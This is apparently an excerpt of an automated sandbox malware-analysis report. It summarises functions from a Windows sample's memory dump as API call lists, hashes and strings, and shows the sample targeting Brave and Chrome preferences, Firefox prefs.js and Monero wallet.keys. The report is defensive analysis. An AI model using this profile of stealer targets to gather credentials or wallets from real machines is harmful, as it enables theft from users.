                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                        • API String ID: 3334442632-726946144
                        • Opcode ID: 88677bd34c376a8d88b063982af0704d88577df33793096a19feacf2feebe512
                        • Instruction ID: ba032e4850b359891abd7ad1c709d4e2ce5263a293845474053e54b48ba1233f
                        • Opcode Fuzzy Hash: 88677bd34c376a8d88b063982af0704d88577df33793096a19feacf2feebe512
                        • Instruction Fuzzy Hash: 2B426672900104ABCB14FB70DD9AEED77BCAF94300F4455A9F546B7181EE34AB89CB92
                        Function 00E34910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 00E3492C
                        • FindFirstFileA.KERNEL32(?,?), ref: 00E34943
                        • StrCmpCA.SHLWAPI(?,00E40FDC), ref: 00E34971
                        • StrCmpCA.SHLWAPI(?,00E40FE0), ref: 00E34987
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E34B7D
                        • FindClose.KERNEL32(000000FF), ref: 00E34B92
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s$%s\%s$%s\*
                        • API String ID: 180737720-445461498
                        • Opcode ID: 58c83166298e3ec8c864942a7a78b867b12e9459559b24ef99f1584972f9dbd0
                        • Instruction ID: 4efdcb2e62b0e293f5d9e3991e94f8fa99d1c510ed1e1af91c12f290f491f4a0
                        • Opcode Fuzzy Hash: 58c83166298e3ec8c864942a7a78b867b12e9459559b24ef99f1584972f9dbd0
                        • Instruction Fuzzy Hash: 776159B1600214ABCB34EBA0EC49FEA77BCBB48700F044598F649B6145EB75EB45CF91
                        Function 00E34570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                        Download Yara Rule
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00E34580
                        • RtlAllocateHeap.NTDLL(00000000), ref: 00E34587
                        • wsprintfA.USER32 ref: 00E345A6
                        • FindFirstFileA.KERNEL32(?,?), ref: 00E345BD
                        • StrCmpCA.SHLWAPI(?,00E40FC4), ref: 00E345EB
                        • StrCmpCA.SHLWAPI(?,00E40FC8), ref: 00E34601
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E3468B
                        • FindClose.KERNEL32(000000FF), ref: 00E346A0
                        • lstrcat.KERNEL32(?,0196FAF8), ref: 00E346C5
                        • lstrcat.KERNEL32(?,0196E538), ref: 00E346D8
                        • lstrlen.KERNEL32(?), ref: 00E346E5
                        • lstrlen.KERNEL32(?), ref: 00E346F6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                        • String ID: %s\%s$%s\*
                        • API String ID: 671575355-2848263008
                        • Opcode ID: cb2c474a81f81bc43bd9cbda371e2e62f571a2f06c0ab69401a694da5315cf95
                        • Instruction ID: e83eb3cbc333eed2c8e6c7ff760fcacef6d533618fd415952847ba28bb7fe9b4
                        • Opcode Fuzzy Hash: cb2c474a81f81bc43bd9cbda371e2e62f571a2f06c0ab69401a694da5315cf95
                        • Instruction Fuzzy Hash: 535145B1640218ABC724FB70DC89FE9777CAB58300F405598F649B2194EB799B84CF91
                        Function 00E33EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 00E33EC3
                        • FindFirstFileA.KERNEL32(?,?), ref: 00E33EDA
                        • StrCmpCA.SHLWAPI(?,00E40FAC), ref: 00E33F08
                        • StrCmpCA.SHLWAPI(?,00E40FB0), ref: 00E33F1E
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E3406C
                        • FindClose.KERNEL32(000000FF), ref: 00E34081
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s
                        • API String ID: 180737720-4073750446
                        • Opcode ID: de14f62c0862e157c18eb24b00989fe5dfebd63087b63a9e23c9ad4d94914929
                        • Instruction ID: fbbc8a6d877f75a2d541367b40b0c3b12c8399c1ebf89a2246d66d194a970193
                        • Opcode Fuzzy Hash: de14f62c0862e157c18eb24b00989fe5dfebd63087b63a9e23c9ad4d94914929
                        • Instruction Fuzzy Hash: 5C5137B5A00218EBCB24FB70DC49EEA777CBB48300F445598F659A6044DB75EB85CF51
                        Function 00E2ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                        Download Yara Rule
                        APIs
                        • wsprintfA.USER32 ref: 00E2ED3E
                        • FindFirstFileA.KERNEL32(?,?), ref: 00E2ED55
                        • StrCmpCA.SHLWAPI(?,00E41538), ref: 00E2EDAB
                        • StrCmpCA.SHLWAPI(?,00E4153C), ref: 00E2EDC1
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E2F2AE
                        • FindClose.KERNEL32(000000FF), ref: 00E2F2C3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\*.*
                        • API String ID: 180737720-1013718255
                        • Opcode ID: 3c6319c7d4c05c3674c99439c0db08c3ef47c730405fe9615a52a54914d707f3
                        • Instruction ID: 2b8400c9bfab353a1e5df8960ebce96923768aa6fce813812ab76dcc77cfba85
                        • Opcode Fuzzy Hash: 3c6319c7d4c05c3674c99439c0db08c3ef47c730405fe9615a52a54914d707f3
                        • Instruction Fuzzy Hash: 0CE10172911118AADB18FB60DC9AEEE77B8AF54300F4451F9B44A72052EE306FCACF51
                        Function 00E2F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E3A920: lstrcpy.KERNEL32(00000000,?), ref: 00E3A972
                          • Part of subcall function 00E3A920: lstrcat.KERNEL32(00000000), ref: 00E3A982
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E415B8,00E40D96), ref: 00E2F71E
                        • StrCmpCA.SHLWAPI(?,00E415BC), ref: 00E2F76F
                        • StrCmpCA.SHLWAPI(?,00E415C0), ref: 00E2F785
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E2FAB1
                        • FindClose.KERNEL32(000000FF), ref: 00E2FAC3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: prefs.js
                        • API String ID: 3334442632-3783873740
                        • Opcode ID: 759dbd67d96b74da33c4ed19601ddf311f7bb8a33a26edfab5518e519ef9f079
                        • Instruction ID: 3862e49a5b9dc122275264831a651bb304cbc27f8a66904206723fe35858d55f
                        • Opcode Fuzzy Hash: 759dbd67d96b74da33c4ed19601ddf311f7bb8a33a26edfab5518e519ef9f079
                        • Instruction Fuzzy Hash: 3FB154729001189BCB28FF60DC99BEE77B9AF94300F4451B9E44AB7141EF356B89CB91
                        Function 00E216D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E4510C,?,?,?,00E451B4,?,?,00000000,?,00000000), ref: 00E21923
                        • StrCmpCA.SHLWAPI(?,00E4525C), ref: 00E21973
                        • StrCmpCA.SHLWAPI(?,00E45304), ref: 00E21989
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E21D40
                        • DeleteFileA.KERNEL32(00000000), ref: 00E21DCA
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E21E20
                        • FindClose.KERNEL32(000000FF), ref: 00E21E32
                          • Part of subcall function 00E3A920: lstrcpy.KERNEL32(00000000,?), ref: 00E3A972
                          • Part of subcall function 00E3A920: lstrcat.KERNEL32(00000000), ref: 00E3A982
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 1415058207-1173974218
                        • Opcode ID: dc98af9c0f2c1a38c8c2eeadf43dc481e4da5346d0bf382fb37b18a8467e8369
                        • Instruction ID: a788a0bada7b81aeb1962abd0babeedb98e22a4ad31a052f97181cda620a3dc7
                        • Opcode Fuzzy Hash: dc98af9c0f2c1a38c8c2eeadf43dc481e4da5346d0bf382fb37b18a8467e8369
                        • Instruction Fuzzy Hash: 8012EE72910118ABDB19FB60DC9AAEE77B8AF54300F4461E9B14676091EF306FC9CF91
                        Function 00E2DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00E40C2E), ref: 00E2DE5E
                        • StrCmpCA.SHLWAPI(?,00E414C8), ref: 00E2DEAE
                        • StrCmpCA.SHLWAPI(?,00E414CC), ref: 00E2DEC4
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E2E3E0
                        • FindClose.KERNEL32(000000FF), ref: 00E2E3F2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                        • String ID: \*.*
                        • API String ID: 2325840235-1173974218
                        • Opcode ID: 2e31b3af1e3a465fb2046e41a42580a9388c6b4e31778362fd109ec05f7f43d0
                        • Instruction ID: 8594d2199f2047b4c38d30f9adf6ed50e0a33fdf899d08bd52926101f0759a53
                        • Opcode Fuzzy Hash: 2e31b3af1e3a465fb2046e41a42580a9388c6b4e31778362fd109ec05f7f43d0
                        • Instruction Fuzzy Hash: 6CF1CF72914118AADB19FB60DC99EEE77B8BF54300F4461E9A05A72091EF306FCACF51
                        Function 00E2DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                          • Part of subcall function 00E3A920: lstrcpy.KERNEL32(00000000,?), ref: 00E3A972
                          • Part of subcall function 00E3A920: lstrcat.KERNEL32(00000000), ref: 00E3A982
                          • Part of subcall function 00E3A9B0: lstrlen.KERNEL32(?,01968BB0,?,\Monero\wallet.keys,00E40E17), ref: 00E3A9C5
                          • Part of subcall function 00E3A9B0: lstrcpy.KERNEL32(00000000), ref: 00E3AA04
                          • Part of subcall function 00E3A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00E3AA12
                          • Part of subcall function 00E3A8A0: lstrcpy.KERNEL32(?,00E40E17), ref: 00E3A905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E414B0,00E40C2A), ref: 00E2DAEB
                        • StrCmpCA.SHLWAPI(?,00E414B4), ref: 00E2DB33
                        • StrCmpCA.SHLWAPI(?,00E414B8), ref: 00E2DB49
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00E2DDCC
                        • FindClose.KERNEL32(000000FF), ref: 00E2DDDE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
                        • Associated: 00000000.00000002.2189001666.0000000000E20000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000ED1000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000EDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189027088.000000000106A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000107E000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001200000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.00000000012E4000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.000000000130A000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001312000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189191337.0000000001321000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189483225.0000000001322000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190212416.00000000014C0000.00000040.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2190249231.00000000014C1000.00000080.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_e20000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID:
                        • API String ID: 3334442632-0
                        • Opcode ID: a8e7b2197a839b9437c4dc752d34c1844a9bde6488dc0d559d3965fcc3986433
                        • Instruction ID: 40cb7aab52840d911ac597075beabec4b551f4ad59b4116abb34c2b6765a170d
                        • Opcode Fuzzy Hash: a8e7b2197a839b9437c4dc752d34c1844a9bde6488dc0d559d3965fcc3986433
                        • Instruction Fuzzy Hash: 8A916972900114ABCB14FF70EC9A9ED77BCAF94300F4496A9F946B7141EE349B49CB92
                        Function 00E37B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00E3A740: lstrcpy.KERNEL32(00E40E17,00000000), ref: 00E3A788
                        • GetKeyboardLayoutList.USER32(00000000,00000000,00E405AF), ref: 00E37BE1
                        • LocalAlloc.KERNEL32(00000040,?), ref: 00E37BF9
                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 00E37C0D
                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00E37C62
                        • LocalFree.KERNEL32(00000000), ref: 00E37D22
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189027088.0000000000E21000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E20000, based on PE: true
